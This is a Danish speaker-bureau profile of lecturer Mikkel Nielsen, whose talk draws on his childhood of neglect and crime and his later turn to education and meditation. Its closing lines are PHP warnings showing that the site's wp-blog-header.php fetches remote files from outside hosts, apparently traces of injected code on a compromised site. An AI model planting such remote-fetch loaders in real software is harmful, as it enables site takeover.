img-us
  • asc

    Foredragsholder Mikkel Nielsen

  • asc

    Emne SAMFUNDETS NÅLEØJE

  • asc

    pris 5000.-

Samfundets nåleøje
Foredraget omhandler hvordan omsorgssvigt, systemsvigt og kulturarv, sætter sine spor.

Hvad konsekvenser der er ved en opvækst i et usundt miljø og om at kriminalitet er dagligdagen, og kampen for at begå sig som som en lovlydig og almindelig borger, hvilket for mig var og er en surrealistisk oplevelse som hvis en kernefamilie skiftet løbebane og blev kriminel.

Baggrund
Mit navn er Mikkel Nielsen, jeg er 29 år og har 3 børn. Mit liv har fra barnsben har været præget af kriminalitet, ustabilitet, en far i fængsel og omsorgssvigt som resulterede i, at jeg har svært at navigere i samfundets normer. Jeg fik min første fængselsstraf som 18 årig, blev sigtet for drabsforsøg men blev kun dømt for grov vold, derefter har jeg afsonet en fængselsstraf for ulovlig våbenbesiddelse, vold, momssvindel, hæleri, trusler, osv..

Mit største problem har altid været, at jeg kender ikke til andet, det var min hverdag. Det har aldrig handlet om at være sej men om overlevelse. Det var min far der lærte mig at tage stoffer, sælge stoffer, og begå sig og forsørge mig via det kriminelle miljø.

Jeg blev hjemløs som 14 årig første gang. Min mor flyttede sammen med sin alkoholiserede kæreste og jeg var ikke velkommen. De efterlod mig i et telt på en naturcampingplads.

Skolerne jeg gik på anså jeg ikke som en læingsplatform, men som et sted man lavede penge. Jeg blev hurtigt smidt ud og har gået på seks forskellige. Jeg fik hurtigt øgenavnet Nazi Mikkel, fordi jeg i min afmagt forskød mit had på udlændinge, og jeg ønskede bare at min vrede kom ud, lige meget hvordan. Måske var det et desperat råb om hjælp som ingen hørte.

Jeg prøvede at opsøge hjælp ved kommunen og det offentlige, men blev blankt afvist. De troede ikke på jeg var hjemløs. Fra jeg var 8 til jeg var 16 år, havde min mor en meget forstyrret kæreste, så når de var sammen var jeg alene, og når de ikke var sammen var jeg beskytteren idet min mor i de perioder var udsat for vold og konstante trusler.

Herudover fungerede jeg også fra sekstenårsalderen som min fars bodyguard og blev ofte involveret i hans narkokonflikter. Dette resulterede i at jeg har sovet med skudsikre veste on and off det meste af mit teenagerliv. Ligesom jeg følte at det var min pligt at forsørge mine forældre via kriminalitet.

I totusindeogtolv byttede jeg stofferne ud med steroider, hvilket resulterede i, at jeg i 2014 fik en blodprop i hjernen, som ændret mit liv massivt, jeg begyndte at opfatte alt anderledes, og havde svære men.

Kommunen ville på baggrund af følgerne, tilkende mig førtidspension men jeg bestemte mig for at gøre mine børn stolte og være et godt forbillede. Jeg skulle ikke ende på overførselsindkomst som mine forældre - Jeg havde fået en ny chance.

Så jeg tog min 9 klasses eksamen og læste videre på HF. Nu venter jeg på at blive optaget på universitetet.

Jeg fik konstateret komplek PTSD, og efter nogen tid begyndte jeg at meditere og i dag er jeg buddhist. Meditationen gør også at jeg ikke behøver medicin for min PTSD.

Foredrag
Mit foredrag handler om viljen, men ikke mindst om skellet mellem os og dem. Det handler også om hvordan mennesker med en baggrund som min, må kæmpe med en borgerlige tilværelse, som er en kæmpe omvæltning når man ikke er vant til at begå sig i de normer.

Jeg tager selv ansvar for det lort jeg har lavet. Men jeg håber, at jeg med mit foredrag kan få folk til at reflektere lidt over medmenneskelighed og næstekærlighed. Selvom jeg er vred på systemet, så har jeg også erkendt at vi allesammen er en del af det og hermed nytter det ikke noget at pege fingre af systemet.

Et menneske, der havde tolket min vrede og afvigende adfærd som et råb om hjælp kunne måske have ændret min livsbane får. Kig på dine medmennesker og forsøg at forstå dem i stedet for at dømme - Vi har allesammen en gensidig afhængighed af og et ansvar for hinanden.

Udbytte af foredraget:
- Social arv
- Mønsterbryder
- Kærlighed er vejen
- Fordomme både fra den almindelige borgeres syn men også fra den kriminelles.
- Vilje
- Sejr
- Ensomhed og nærvær
- Velfærd uden nærvær
- Ryggen mod frygten


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Christian Ryge

Louise Bjørndal

Thomas Dybro

Ahmet Aksoy


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22